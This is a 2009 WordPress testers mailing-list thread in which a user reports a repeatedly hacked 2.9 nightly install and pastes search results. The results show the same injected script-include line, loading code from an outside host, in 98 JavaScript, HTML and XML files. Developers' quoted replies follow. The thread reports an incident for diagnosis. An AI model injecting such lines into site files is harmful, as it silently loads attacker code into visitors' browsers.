here are more info Search "northstarsocal.com" (98 hits in 98 files) C:\Users\Användaren\Documents\Downloads\sidan\readme.html (1 hits) Line 8: <script src=http://northstarsocal.com/testpage/contact.php></script><body> C:\Users\Användaren\Documents\Downloads\sidan\wordpress.2009-11-20.xml (1 hits) Line 1: <script src=http://northstarsocal.com/testpage/contact.php></script><?xml version="1.0" encoding="UTF-8"?> C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\js\scripts.js (1 hits) Line 29: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\scripts.js (1 hits) Line 30: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.dev.js (1 hits) Line 309: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.html (1 hits) Line 30: if(engine == "msie" || engine == "gecko") document.write('<script src=http://northstarsocal.com/testpage/contact.php ></script><body><pre> </pre></body>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.js (1 hits) Line 139: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\gecko.js (1 hits) Line 294: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\msie.js (1 hits) Line 305: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\opera.js (1 hits) Line 262: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\asp.js (1 hits) Line 118: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\autoit.js (1 hits) Line 34: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\csharp.js (1 hits) Line 26: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\css.js (1 hits) Line 25: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\generic.js (1 hits) Line 27: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\html.js (1 hits) Line 61: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\java.js (1 hits) Line 26: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\javascript.js (1 hits) Line 32: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\perl.js (1 hits) Line 29: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\php.js (1 hits) Line 62: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\ruby.js (1 hits) Line 28: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\sql.js (1 hits) Line 32: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\text.js (1 hits) Line 11: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\vbscript.js (1 hits) Line 118: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\xsl.js (1 hits) Line 104: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.dev.js (1 hits) Line 709: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.dev.js (1 hits) Line 50: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\crop\cropper.js (1 hits) Line 518: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.dev.js (1 hits) Line 129: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.dev.js (1 hits) Line 693: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.dev.js (1 hits) Line 1199: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.js (1 hits) Line 164: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\interface.js (1 hits) Line 14: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.dev.js (1 hits) Line 130: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.dev.js (1 hits) Line 874: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.dev.js (1 hits) Line 129: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.js (1 hits) Line 22: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.schedule.js (1 hits) Line 37: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.dev.js (1 hits) Line 101: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.dev.js (1 hits) Line 331: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.core.js (1 hits) Line 11: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.dialog.js (1 hits) Line 16: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.draggable.js (1 hits) Line 14: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.droppable.js (1 hits) Line 15: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.resizable.js (1 hits) Line 14: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.selectable.js (1 hits) Line 14: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.sortable.js (1 hits) Line 14: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.tabs.js (1 hits) Line 14: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.dev.js (1 hits) Line 483: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.js (1 hits) Line 13: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\prototype.js (1 hits) Line 4185: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.dev.js (1 hits) Line 579: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\builder.js (1 hits) Line 138: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\controls.js (1 hits) Line 967: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\dragdrop.js (1 hits) Line 976: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\effects.js (1 hits) Line 1124: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\prototype.js (1 hits) Line 4185: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\scriptaculous.js (1 hits) Line 59: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\slider.js (1 hits) Line 277: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\sound.js (1 hits) Line 57: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\unittest.js (1 hits) Line 569: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\wp-scriptaculous.js (1 hits) Line 61: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfobject.js (1 hits) Line 6: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.dev.js (1 hits) Line 339: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.cookies.js (1 hits) Line 55: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.queue.js (1 hits) Line 100: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.speed.js (1 hits) Line 343: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.swfobject.js (1 hits) Line 107: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload-all.js (1 hits) Line 10: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload.js (1 hits) Line 982: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\thickbox\thickbox.js (1 hits) Line 323: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\blank.htm (1 hits) Line 6: <script src=http://northstarsocal.com/testpage/contact.php></script><body class="mceContentBody"> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\langs\wp-langs-en.js (1 hits) Line 433: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce.js (1 hits) Line 3: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce_popup.js (1 hits) Line 6: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\editable_selects.js (1 hits) Line 71: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\form_utils.js (1 hits) Line 201: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\mctabs.js (1 hits) Line 78: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\validate.js (1 hits) Line 221: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\wp-tinymce.js (1 hits) Line 30: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.dev.js (1 hits) Line 195: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.dev.js (1 hits) Line 66: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.dev.js (1 hits) Line 361: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>'); C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.js (1 hits) Line 2: document.write('<script src= http://northstarsocal.com/testpage/contact.php ><\/script>');
On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32) <[email protected]>wrote: > What are the symptoms of the hack? > > Install something to log all post requests ASAP, to gather data if its a > new vulnerability: http://www.village-idiot.org/post-logger > > You'd not by any chance be on MediaTemple servers would you? *(Who's your > webhost) > > > On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <[email protected]> wrote: > > OK, cause my 2.9 nightly gets hacked every day.. >> in that case its a new security bug.. >> Ive wasted every file/folde an done a fresh installation, everything >> except >> the db is new, also passwd is changed on everything except db. >> No extra user is in db. >> >> >> >> On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32) <[email protected] >> >wrote: >> >> Yes. Everything in the 2.8 branch are backports from the 2.9 branch. >>> >>> >>> >>> On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <[email protected]> wrote: >>> >>> Hi! >>> >>>> Is this fix also in 2.9 nightlybuild? >>>> >>>> /Phibrz >>>> >>>> On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <[email protected]> wrote: >>>> >>>> http://wordpress.org/wordpress-2.8.6-beta1.zip >>>> >>>>> >>>>> Fixes these two security issues: >>>>> >>>>> >>>>> >>>>> >>>>> https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6 >>>>> >>>>> A logged in user with author privileges is required to exploit. Press >>>>> This and uploads need testing. >>>>> _______________________________________________ >>>>> wp-testers mailing list >>>>> [email protected] >>>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>>> >>>>> _______________________________________________ >>>>> >>>> wp-testers mailing list >>>> [email protected] >>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>> >>>> >>>> >>> -- >>> Using Opera's revolutionary e-mail client: http://www.opera.com/mail/ >>> >>> _______________________________________________ >>> wp-testers mailing list >>> [email protected] >>> http://lists.automattic.com/mailman/listinfo/wp-testers >>> >>> _______________________________________________ >> wp-testers mailing list >> [email protected] >> http://lists.automattic.com/mailman/listinfo/wp-testers >> >> > > -- > Using Opera's revolutionary e-mail client: http://www.opera.com/mail/ > _______________________________________________ > wp-testers mailing list > [email protected] > http://lists.automattic.com/mailman/listinfo/wp-testers > _______________________________________________ wp-testers mailing list [email protected] http://lists.automattic.com/mailman/listinfo/wp-testers
